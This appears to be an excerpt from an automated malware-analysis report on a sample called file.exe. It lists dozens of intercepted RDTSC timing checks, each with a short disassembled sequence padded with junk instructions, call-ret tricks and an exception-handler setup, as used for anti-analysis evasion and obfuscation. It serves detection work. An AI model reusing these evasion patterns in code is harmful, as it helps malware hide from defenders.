Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0E2C4 second address: C0E2CE instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE0491DA112h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0E2CE second address: C0E2D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0E2D4 second address: C0E2DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C10886 second address: C1088C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1088C second address: C108A1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE0491DA10Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C10C9A second address: C10CAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE048D058A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C10CAE second address: C10CB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C10DC3 second address: C10DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C10F08 second address: C10F0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C11A93 second address: C11A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C12B42 second address: C12B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C12B47 second address: C12B4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C13B82 second address: C13B86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C133A7 second address: C133AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C13B86 second address: C13B8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C14785 second address: C147AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE048D058A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d jg 00007FE048D05896h 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C147AD second address: C147B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FE0491DA106h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C151EF second address: C151F9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE048D05896h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C174E5 second address: C174EA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C174EA second address: C174FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007FE048D05896h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C15B25 second address: C15B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C174FB second address: C174FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C15B2A second address: C15B3C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE0491DA108h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C174FF second address: C1750D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FE048D05896h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C15B3C second address: C15B40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1750D second address: C17586 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE048D058A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FE048D05898h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 jmp 00007FE048D058A5h 0x0000002a jmp 00007FE048D058A6h 0x0000002f push 00000000h 0x00000031 movsx edi, bx 0x00000034 push 00000000h 0x00000036 mov dword ptr [ebp+1246834Eh], esi 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C17586 second address: C1758A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1758A second address: C1758E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1758E second address: C17594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1A273 second address: C1A288 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE048D058A1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C19FD8 second address: C19FDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1A288 second address: C1A28C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C19FDC second address: C19FE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C19FE2 second address: C19FE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1BEDD second address: C1BF52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007FE0491DA108h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 push 00000000h 0x00000025 mov bx, F82Fh 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ecx 0x0000002e call 00007FE0491DA108h 0x00000033 pop ecx 0x00000034 mov dword ptr [esp+04h], ecx 0x00000038 add dword ptr [esp+04h], 00000014h 0x00000040 inc ecx 0x00000041 push ecx 0x00000042 ret 0x00000043 pop ecx 0x00000044 ret 0x00000045 add bx, 6BEEh 0x0000004a movzx ebx, dx 0x0000004d push eax 0x0000004e pushad 0x0000004f pushad 0x00000050 pushad 0x00000051 popad 0x00000052 jmp 00007FE0491DA113h 0x00000057 popad 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b popad 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1CE07 second address: C1CE0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1CE0B second address: C1CE11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1CE11 second address: C1CEA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE048D058A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jne 00007FE048D05896h 0x00000014 popad 0x00000015 pop esi 0x00000016 nop 0x00000017 mov ebx, dword ptr [ebp+122D2C73h] 0x0000001d mov ebx, dword ptr [ebp+122D2A26h] 0x00000023 push 00000000h 0x00000025 mov ebx, dword ptr [ebp+12456963h] 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push edx 0x00000030 call 00007FE048D05898h 0x00000035 pop edx 0x00000036 mov dword ptr [esp+04h], edx 0x0000003a add dword ptr [esp+04h], 0000001Dh 0x00000042 inc edx 0x00000043 push edx 0x00000044 ret 0x00000045 pop edx 0x00000046 ret 0x00000047 pushad 0x00000048 mov edi, dword ptr [ebp+122D2AC6h] 0x0000004e mov edi, dword ptr [ebp+122D2EAEh] 0x00000054 popad 0x00000055 xchg eax, esi 0x00000056 jmp 00007FE048D0589Dh 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007FE048D058A3h 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1CEA8 second address: C1CEAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1CEAE second address: C1CEB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1DF19 second address: C1DF1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1CFEF second address: C1CFF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1DF1F second address: C1DF4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA10Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov di, DF98h 0x00000012 push 00000000h 0x00000014 mov di, dx 0x00000017 push 00000000h 0x00000019 add dword ptr [ebp+124576DCh], esi 0x0000001f push eax 0x00000020 pushad 0x00000021 push edx 0x00000022 push esi 0x00000023 pop esi 0x00000024 pop edx 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1CFF3 second address: C1CFF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1CFF9 second address: C1D000 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1FF8E second address: C1FF92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1EFDE second address: C1EFE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1EFE2 second address: C1EFF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1EFF0 second address: C1EFFA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE0491DA106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1EFFA second address: C1F001 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C21072 second address: C21077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C21077 second address: C21089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE048D0589Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C23003 second address: C23007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C23007 second address: C2300B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C22119 second address: C2212B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE0491DA106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2212B second address: C2212F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2212F second address: C22135 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C22135 second address: C2213B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C231EE second address: C23207 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA10Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C23207 second address: C2320E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C24F49 second address: C24FDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FE0491DA106h 0x00000009 jmp 00007FE0491DA10Dh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007FE0491DA108h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c jnp 00007FE0491DA108h 0x00000032 mov edi, esi 0x00000034 push 00000000h 0x00000036 mov ebx, dword ptr [ebp+122D339Dh] 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push ebx 0x00000041 call 00007FE0491DA108h 0x00000046 pop ebx 0x00000047 mov dword ptr [esp+04h], ebx 0x0000004b add dword ptr [esp+04h], 0000001Ah 0x00000053 inc ebx 0x00000054 push ebx 0x00000055 ret 0x00000056 pop ebx 0x00000057 ret 0x00000058 add ebx, dword ptr [ebp+122D1C76h] 0x0000005e jmp 00007FE0491DA117h 0x00000063 push eax 0x00000064 pushad 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C260CB second address: C2614B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FE048D0589Ah 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007FE048D05898h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 mov dword ptr [ebp+124829A3h], eax 0x0000002d mov edi, dword ptr [ebp+122D2BA2h] 0x00000033 push 00000000h 0x00000035 jbe 00007FE048D058A2h 0x0000003b jmp 00007FE048D0589Ch 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push ecx 0x00000045 call 00007FE048D05898h 0x0000004a pop ecx 0x0000004b mov dword ptr [esp+04h], ecx 0x0000004f add dword ptr [esp+04h], 00000016h 0x00000057 inc ecx 0x00000058 push ecx 0x00000059 ret 0x0000005a pop ecx 0x0000005b ret 0x0000005c push eax 0x0000005d jnp 00007FE048D058A8h 0x00000063 push eax 0x00000064 push edx 0x00000065 js 00007FE048D05896h 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C27EA9 second address: C27EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C251D6 second address: C251F8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE048D05898h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e js 00007FE048D05896h 0x00000014 jmp 00007FE048D0589Bh 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C262F5 second address: C26388 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 je 00007FE0491DA109h 0x0000000d xor bh, FFFFFFCEh 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov bh, D9h 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 push 00000000h 0x00000022 push esi 0x00000023 call 00007FE0491DA108h 0x00000028 pop esi 0x00000029 mov dword ptr [esp+04h], esi 0x0000002d add dword ptr [esp+04h], 0000001Ah 0x00000035 inc esi 0x00000036 push esi 0x00000037 ret 0x00000038 pop esi 0x00000039 ret 0x0000003a jmp 00007FE0491DA10Dh 0x0000003f mov dword ptr [ebp+12468E92h], ebx 0x00000045 mov eax, dword ptr [ebp+122D0D89h] 0x0000004b mov ebx, 4ADD81EDh 0x00000050 mov ebx, 271FBB41h 0x00000055 push FFFFFFFFh 0x00000057 sub dword ptr [ebp+122D26D3h], ebx 0x0000005d nop 0x0000005e pushad 0x0000005f jg 00007FE0491DA10Ch 0x00000065 js 00007FE0491DA10Ch 0x0000006b js 00007FE0491DA106h 0x00000071 popad 0x00000072 push eax 0x00000073 push ebx 0x00000074 pushad 0x00000075 jnc 00007FE0491DA106h 0x0000007b push eax 0x0000007c push edx 0x0000007d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C24292 second address: C24297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C24297 second address: C242A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FE0491DA106h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C27123 second address: C27127 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C27127 second address: C2712D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2AE25 second address: C2AE5B instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE048D058A2h 0x00000008 jmp 00007FE048D0589Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007FE048D0589Dh 0x00000018 jmp 00007FE048D0589Eh 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2AE5B second address: C2AE61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2AE61 second address: C2AE65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2B037 second address: C2B03C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C30AA6 second address: C30AAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C33EEB second address: C33F08 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FE0491DA117h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C34091 second address: C340A8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FE048D058A2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C340A8 second address: C340B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C340B1 second address: C340B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C39F9D second address: C39FBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE0491DA110h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007FE0491DA106h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C39FBE second address: C39FD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE048D058A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C39FD9 second address: C39FFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA119h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C39FFE second address: C3A038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE048D058A9h 0x00000009 popad 0x0000000a jmp 00007FE048D0589Fh 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 jns 00007FE048D05898h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3FF16 second address: C3FF1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3FF1A second address: C3FF20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3FF20 second address: C3FF42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push ecx 0x0000000d jmp 00007FE0491DA10Eh 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3FF42 second address: C3FF46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C40229 second address: C4024C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA119h 0x00000007 jc 00007FE0491DA112h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C40529 second address: C40537 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FE048D0589Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C407AD second address: C407C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA113h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
